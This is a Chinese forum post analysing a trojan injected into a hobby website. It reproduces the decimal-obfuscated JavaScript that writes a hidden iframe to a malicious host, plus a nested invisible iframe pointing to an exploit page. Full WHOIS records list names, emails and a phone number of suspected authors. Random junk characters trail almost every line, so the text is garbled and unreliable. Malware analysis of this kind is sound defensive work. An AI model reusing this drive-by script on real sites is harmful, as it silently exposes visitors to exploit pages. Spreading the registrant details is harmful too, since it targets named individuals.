[原创]一篇刚写的分析木马手记

首发在我的博客里面，  : (UK'i  
{-A|f  
http://www.areway.cn/?p=175 Wf c/?{  
B=A!hXNa  
x`E<]z*w}  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： 77\+V 0cF  
          0zW*JJxV  
<script>t=’60,105,102,114,97,109,101, <]Td7-n  
32,115,114,99,61,104,116,116,112,58,47,47, 4DL;Y  
102,114,101,101,46,117,45,117,117,117,46,99, 2"&GH1  
110,47,101,114,114,111,114,46,104,116,109, |[],z 8  
32,119,105,100,116,104,61,49,48,48,32,104, 2u.0AG   
101,105,103,104,116,61,48,62,60,47,105,102, 3IYF
vq~  
114,97,109,101,62′; ~z^?+MgZ2  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> bi8_5I[  
                                                                                                  rrL.Y&DTK  
<script>t=’60,105,102,114,97,109,101,32,115, (xgw';g  
114,99,61,104,116,116,112,58,47,47,102,114, $+j1^  
101,101,46,117,45,117,117,117,46,99,110,47, etX@z'H  
101,114,114,111,114,46,104,116,109,32,119, OIKx:&uIk  
105,100,116,104,61,49,48,48,32,104,101,105, ]SJ#:7  
103,104,116,61,48,62,60,47,105,102,114,97, /3s&??{tv  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); [!uzXVS3  
document.write(t);</script> @}y.  
                                                                                                  ]bds~OY5 U  
<html xmlns=” puPI^6y%  
http://www.w3.org/1999/xhtml jG>W+lq  
“> O9daeIF0#  
<head> 1(p:dqGS  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> DS?.'"n[u  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> $0$sM/%  
<title>首页 - 爱生活家庭网 0?54 8yH  
                                                                                                                                                    <AU*lLZ  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 "Z&.m..gc  
转换字符串后的大概内容是（谁点击后果自付）： oU|G74e6  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… z&;8pZr  
                                                                                                                                  0
+SDFh  
查询玉米u-uuu.cn的详细信息： +/[M Ex=   
Domain Name: u-uuu.cn m-t:'B  
ROID: 20070901s10001s64972306-cn qfsPX
6]  
Domain Status: ok .D@J\<,+l  
Registrant Organization: 王雷 yzN[%/  
Registrant Name: 王雷 ,l~<|\4,wv  
Administrative Email: czlovexs@126.com ZWkRoJXNi  
Sponsoring Registrar: 北京万网志成科技有限公司 wPg/.N9H  
Name Server:ns.yovole.com m*m),mZ"  
Name Server:ns1.yovole.com ^m z9sV  
Registration Date: 2007-09-01 17:54 6]v}  
Expiration Date: 2008-09-01 17:54 `XxnQng  
最后PING了一下地址 都没有什么…. ^;EhKG  
                                                                                                o*Qa*<n  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. 
mG S4W;  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> BwT[SI
<Sg  
<script language=”javascript” src=” CM?:\$4  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script HoPpUq5,  
> c|/HX%Y  
这个玉米应该有可能是木马作者的： R!dC20IMvH  
foafau.info的详细信息： FMdu30JV  
Access to INFO WHOIS information is provided to assist persons in c`<2&ke  
determining the contents of a domain name registration record in the Na91K4r#  
Afilias registry database. The data in this record is provided by ~xd?y*gk;  
Afilias Limited for informational purposes only, and Afilias does not ny{C,1QG  
guarantee its accuracy.  This service is intended only for query-based #Ha:O,|  
access. You agree that you will use this data only for lawful purposes +Kk1[fh-  
and that, under no circumstances will you use this data to: (a) allow, *$=i1w  
enable, or otherwise support the transmission by e-mail, telephone, or <IR
#W$[  
facsimile of mass unsolicited, commercial advertising or solicitations -,")GA+[7  
to entities other than the data recipient’s own existing customers; or necY/&Ld-  
(b) enable high volume, automated, electronic processes that send -+ByK#<%  
queries or data to the systems of Registry Operator, a Registrar, or cUq]PC$|  
Afilias except as reasonably necessary to register domain names or Ic(qA{SM  
modify existing registrations. All rights reserved. Afilias reserves c~hH 7/v  
the right to modify these terms at any time. By submitting this query, _r-LX"  
you agree to abide by this policy. akvi^]x  
Domain ID:D22418703-LRMS .HZd.*  
Domain Name:FOAFAU.INFO }r,M(Zr  
Created On:20-Nov-2007 16:05:42 UTC rDFrreQP  
Last Updated On:20-Nov-2007 16:05:44 UTC # `=Zc7gf  
Expiration Date:20-Nov-2008 16:05:42 UTC dWd%>9}  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) \~#\ [r_  
Status:CLIENT DELETE PROHIBITED ]\yB,  
Status:CLIENT RENEW PROHIBITED w"0$cL3  
Status:CLIENT TRANSFER PROHIBITED QD.5o
S  
Status:CLIENT UPDATE PROHIBITED |V5BL<4  
Status:TRANSFER PROHIBITED +c_AAMe  
Registrant ID:GODA-040110615 )>ML7y  
Registrant Name:liu hong q.J6'v lj/  
Registrant Organization: E6GubU  
Registrant Street1:beijing eP~
3m  
Registrant Street2: }#1.$a  
Registrant Street3: oVw4M2!"K  
Registrant City:beijing {APfSD_4  
Registrant State/Province: bZ_&AfcB  
Registrant Postal Code:100000 W $D 34(  
Registrant Country:CN Kvg=7o  
Registrant Phone:+86.860108888777  _ %mm  
Registrant Phone Ext.: =+X*$'<J  
Registrant FAX: ai;!Q%B#Q  
Registrant FAX Ext.: I0Do%  
Registrant Email:bbbshiji@163.com G5qsnTxUJ  
Admin ID:GODA-240110615 ^U~Er'mT  
Admin Name:liu hong Wqv7  
Admin Organization: HZ<#H3_ix  
Admin Street1:beijing ^:?z7m  
Admin Street2: ^RnQX#+  
Admin Street3: #4|RaI|.  
Admin City:beijing ?4SYroXUX|  
Admin State/Province: eQQVfEvS  
Admin Postal Code:100000 KdR\a&[MA  
Admin Country:CN 3R/6/+S-  
Admin Phone:+86.860108888777 s;h`n$  
Admin Phone Ext.: 9>+>s ?IgK  
Admin FAX: ^Whc<>|  
Admin FAX Ext.: cV:Q(|QC  
Admin Email:bbbshiji@163.com M(8xwo-W  
Billing ID:GODA-340110615 4oF,;o+v\4  
Billing Name:liu hong <=uO*s>%  
Billing Organization: *Iw19o-I  
Billing Street1:beijing toF6 Z  
Billing Street2: crd|r."
 
Billing Street3: 6Hc25NuQZ  
Billing City:beijing ,=!s;+lu{  
Billing State/Province: sUF5Yq:9  
Billing Postal Code:100000 &>B|?d  
Billing Country:CN Q3lVx5G>4  
Billing Phone:+86.860108888777 R7Tl1!,h  
Billing Phone Ext.: mp3
Dc  
Billing FAX: #euOq  
Billing FAX Ext.: j+<!4 0#  
Billing Email:bbbshiji@163.com k'$7RjCu  
Tech ID:GODA-140110615 nb5%a  
Tech Name:liu hong qyyLU@hd  
Tech Organization: \mN?5QCcE  
Tech Street1:beijing JmF`5  
Tech Street2: 5NSXSR9c  
Tech Street3: hQSJt[8My  
Tech City:beijing ^<yM0'0t  
Tech State/Province: ~$a%& ]\  
Tech Postal Code:100000 ku^2K  
Tech Country:CN r~;.8
qs  
Tech Phone:+86.860108888777 Fo"'[`  
Tech Phone Ext.: g2 V $  
Tech FAX: 
'U`I  
Tech FAX Ext.: /-pop]L  
Tech Email:bbbshiji@163.com If9!S} wa  
Name Server:NS27.DOMAINCONTROL.COM qmnCa&C9  
Name Server:NS28.DOMAINCONTROL.COM G`!;RX  
Name Server: _ )^n[_E  
Name Server: 4ri)%dl1  
Name Server: hG'2(Y!  
Name Server: 6a`_i  
Name Server:
YpZ9h
@,  
Name Server: "ZVBn!  
Name Server: gk6j5 $Y"<  
Name Server: q14A'XW  
Name Server: [laX~(ND{  
Name Server: "=!
QSb  
Name Server: Ah2XwFg?  
                                                                                                          1[`l`Truz  
接着下载每个文件里面的代码： 7 -V_)FK2c  
一步一步看.. El&pux2  
f{Y|FjPp=E  
u= +  
W%Zyt:H`  
4_I,wG@  
)@`w^\E_~_  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来